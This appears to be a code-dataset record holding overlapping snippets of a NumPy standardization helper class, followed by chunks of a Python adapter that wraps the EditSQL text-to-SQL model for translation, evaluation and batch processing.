to", "var_std = np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i = (variable[i]", "= [] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable", "to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable", "\"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with the", "[] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable =", "array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for i", "import numpy as np \"\"\" :param MLLD_functions: this class has several functions that", ":return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = []", "class has several functions that are usually used by myself. \"\"\" class MLLD_functions:", "has several functions that are usually used by myself. \"\"\" class MLLD_functions: def", "variable: the array with the variables you wish to standardize :return: standardized array", "in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable = np.array(new_variable) return self.new_variable", "MLLD_functions: this class has several functions that are usually used by myself. \"\"\"", "MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with the variables you", "variable): \"\"\" :param variable: the array with the variables you wish to standardize", "by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array", "i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable = np.array(new_variable) return", "the array with the variables you wish to standardize :return: standardized array \"\"\"", "array with the variables you wish to standardize :return: standardized array \"\"\" var_average", "new_variable = [] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i)", "that are usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\"", "functions that are usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable):", "np \"\"\" :param MLLD_functions: this class has several functions that are usually used", "you wish to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std =", "with the variables you wish to standardize :return: standardized array \"\"\" var_average =", "standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable =", "used by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the" ]
[ "json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction", "= comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch", "the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS':", "database_schemas_dict={}) # function used for loading of interaction in raw state self.int_load_function =", "for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int})", "para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings =", "f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config =", "vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in vocabulary_tokens:", "use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300", "'mcS': do_lower_case = False else: do_lower_case = True no_pretraining = False bert_config_file =", "prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------", "evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. By", "----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of", "= self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw", "errors use_gold_query: comparison with the gold queries from spider instead of the prediction", "in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data):", "values for nl_question and db_id output_dir: path of dir where the translations are", "return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0]", "InteractionItem that contains the natural language question and the database id \"\"\" #", "\"\"\" Predict the sql for the next utterance in an interaction Args: nl_question:", "and db_id from the input file and save the translations to a file", "original embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define", "data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from", "# determine the instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount)", "results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not", "sample_indices = range(amount) comparisons = [] num_errors = 0 start = time.time() for", "duration / amount num_correct = amount - num_errors accuracy = num_correct * 100", "token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token]", "self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self,", "from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c", "a file in the output directory Args: input_file: path of file with list", "an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self,", "_, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading", "translation model Args: params: the parsed arguments data: the ATISDataset Returns: the loaded", "values for nl_question and db_id from the input file and save the translations", "vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov", "np import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset", "an InteractionItem that contains the natural language question and the database id Args:", "[])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be", "f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"])", "embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a", "path instead of relative path in the first line def get_bert(params): BERT_PT_PATH =", "\" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction", "and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval()", "as context prev_predictions: the previous predictions Returns: an InteractionItem that contains the natural", "json.load(infile) if not amount: # let amount default to _all_ examples from the", "return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql", "time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq =", "prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\":", "create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov", "create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings,", "== \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset", "fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int", "db_id output_dir: path of dir where the translations are saved \"\"\" edi_adap =", "or an empty list prev_predictions: the previous predictions or an empty list Returns:", "the reference. The use_gold_query switch enables comparison with the gold queries from spider", "examples from the file amount = len(references) # determine the instances to test", "output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size", "\"\"\" Creates an InteractionItem that contains the natural language question and the database", "= self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema)", "dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] =", "db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the", "context prev_predictions: the previous predictions Returns: an InteractionItem that contains the natural language", "load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import", "params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem", "pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return", "# transform the raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction", "context prev_nl_questions: the previous questions or an empty list prev_predictions: the previous predictions", "'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb ==", "translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) #", "schema) # normalize and prevent numbering from distorting the results gold_norm = ''.join(\"0\"", "= create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings,", "prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language", "language question and the database id Args: nl_questions: the natural language questions db_id:", "output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original", "editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: # let", "list of dicts with values for nl_question and db_id output_dir: path of dir", "that acts as context prev_nl_questions: the previous questions or an empty list prev_predictions:", "if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create", "prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id,", "\".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction =", "= nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw interaction", "database that acts as context Returns: the sql prediction \"\"\" # preprocess nl_questions", "prediction results of standalone editsql \"\"\" # load the prediction results of standalone", "define a modified embeddings loading function that makes use of the preloaded glove", "== 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False", "no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available()", "translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance", "interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self,", "do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained", "acts as context Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question]", "translations to a file in the output directory Args: input_file: path of file", "dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"] = \"dummy id\"", "SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and", "bert_config # overwrite the original function with the modified version utils_bert.get_bert = get_bert", "= end - start time_per_item = duration / amount num_correct = amount -", "contains the natural language question and the database id \"\"\" # establish the", "the file amount = len(references) # determine the instances to test on if", "else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing -----------------", "map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS':", "\"\"\" Read the list of dicts with values for nl_question and db_id from", "nl_question: the natural language question db_id: the database that acts as context Returns:", "# preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction)", "the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if", "= \"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] = db_id", "prediction results of standalone editsql act as the reference. The use_gold_query switch enables", "write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE,", "request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path", "= False else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')", "if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original", "sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[])", "db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions,", "params: the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model", "The use_gold_query switch enables comparison with the gold queries from spider Args: amount:", "enables comparison with the gold queries from spider Args: amount: the amount of", "= \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering from", "else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower()", "= dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"]", "self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used", "c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in", "model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return model def prepare_interaction(self,", "of the prediction results of standalone editsql \"\"\" # load the prediction results", "create the dataset and model data = ATISDataset(params) self.model = self.load_model(params, data) _,", "42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for", "def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1]", "duration = end - start time_per_item = duration / amount num_correct = amount", "choose samples show_all: write all samples, not only those with errors use_gold_query: comparison", "predictions or an empty list Returns: the sql prediction \"\"\" # preprocess nl_questions", "0 start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw =", "prev_nl_questions: the previous questions or an empty list prev_predictions: the previous predictions or", "comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {}", "eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------", "/ \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS':", "the list of dicts with values for nl_question and db_id from the input", "@classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values", "eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"%", "prev_predictions): \"\"\" Predict the sql for the next utterance in an interaction Args:", "natural language question and the database id Args: nl_questions: the natural language questions", "= edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename =", "= postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False,", "outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading function that makes", "nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] =", "a single natural language question into sql Args: nl_question: the natural language question", "queries from spider instead of the prediction results of standalone editsql \"\"\" #", "request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename", "where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f:", "if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = []", "parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel(", "+= 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"]", "function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params):", "the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # -------", "params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return", "as context Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction", "that acts as context Returns: the sql prediction \"\"\" # preprocess nl_questions =", "interaction in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] = []", "Args: params: the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\"", "CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR):", "function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version", "bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case)", "ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import", "translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\":", "references = json.load(infile) if not amount: # let amount default to _all_ examples", "sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema =", "references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id)", "params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded", "_all_ examples from the file amount = len(references) # determine the instances to", "gold = postprocess_one(gold, schema) # normalize and prevent numbering from distorting the results", "if c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit()", "model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device", "write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\"", "sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else:", "db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent", "= gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end =", "params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining = False", "into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args()", "glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings #", "dicts with values for nl_question and db_id from the input file and save", "sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors =", "glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings", "not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] =", "= dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end -", "example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] =", "= \"query to be predicted\" # transform the raw interaction to an InteractionItem", "from adapters.editsql.constants import * from api import setup_util from api.paths import DB_SCHEMAS_FILE class", "return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural language question", "the prediction results of standalone editsql \"\"\" # load the prediction results of", "comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration =", "with values for nl_question and db_id from the input file and save the", "= num_correct * 100 / amount eval_output = dict() eval_output[\"time per item\"] =", "filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading", "indent=4) # define a modified embeddings loading function that makes use of the", "False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin')", "data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation model", "postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling", "else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration", "= amount - num_errors accuracy = num_correct * 100 / amount eval_output =", "i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory):", "= time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile,", "predicted\" # transform the raw interaction to an InteractionItem obj, _ = self.int_load_function(example)", "in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"]", "SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu'))", "all samples, not only those with errors use_gold_query: comparison with the gold queries", "\"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end", "\".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define", "ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema,", "acts as context prev_predictions: the previous predictions Returns: an InteractionItem that contains the", "with open(input_file) as f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"]", "database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation model Args: params:", "= Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as", "Path import numpy as np import json import torch from editsql.data_util import atis_batch", "------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size", "first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12',", "'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or", "device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config #", "model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() #", "sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] =", "''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if use_gold_query: is_error =", "use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if", "use_gold_query switch enables comparison with the gold queries from spider Args: amount: the", "# let amount default to _all_ examples from the file amount = len(references)", "end - start time_per_item = duration / amount num_correct = amount - num_errors", "no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint =", "Creates an InteractionItem that contains the natural language question and the database id", "def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for", "= references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq,", "def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path", "accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR /", "# load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references", "sql Args: nl_question: the natural language question db_id: the database that acts as", "nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance in", "and model data = ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas =", "if use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm", "pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str =", "for the next utterance in an interaction Args: nl_question: the natural language question", "self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction", "c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for", "open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: # let amount default", "c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in", "the natural language question and the database id Args: nl_questions: the natural language", "= self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction):", "output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings", "preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction =", "BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12',", "BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import", "input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings =", "map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type", "symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema =", "infile: references = json.load(infile) if not amount: # let amount default to _all_", "api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality", "self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) #", "time_per_item eval_output[\"# items\"] = 